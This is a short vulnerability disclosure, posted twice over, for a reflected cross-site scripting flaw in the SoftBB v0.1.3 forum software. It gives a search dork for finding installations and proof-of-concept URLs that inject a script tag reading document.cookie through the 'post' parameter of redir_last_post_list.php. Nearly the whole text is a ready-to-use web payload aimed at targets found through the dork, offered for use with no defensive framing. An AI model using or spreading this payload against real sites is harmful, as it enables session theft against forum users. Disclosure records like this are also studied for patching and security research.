###########################################
#
# Script Name : SoftBB v0.1.3
#
# Version : v0.1.3
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 19/07/2010
#
# Download app : http://www.softbb.net/releases/SoftBB_v0.1.3_mod.zip
#
# Dork : [ Copyright SoftBB v0.1.3 (mods) ] , [ Par Atapi ]
#
###########################################
PoC :
http://[target]/[path]/redir_last_post_list.php?post=18[Xss]
example :
http://[target]/[path]/redir_last_post_list.php?post=18"><script>alert(document.cookie);</script>
local Example :
http://localhost/forum/redir_last_post_list.php?post=18"><script>alert(document.cookie);</script>
SoftBB v0.1.3 XSS vulnerability.txt
###########################################
#
# Script Name : SoftBB v0.1.3
#
# Version : v0.1.3
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 19/07/2010
#
# Download app : http://www.softbb.net/releases/SoftBB_v0.1.3_mod.zip
#
# Dork : [ Copyright SoftBB v0.1.3 (mods) ] , [ Par Atapi ]
#
###########################################
PoC :
http://[target]/[path]/redir_last_post_list.php?post=18[Xss]
example :
http://[target]/[path]/redir_last_post_list.php?post=18"><script>alert(document.cookie);</script>
local Example :
http://localhost/forum/redir_last_post_list.php?post=18"><script>alert(document.cookie);</script>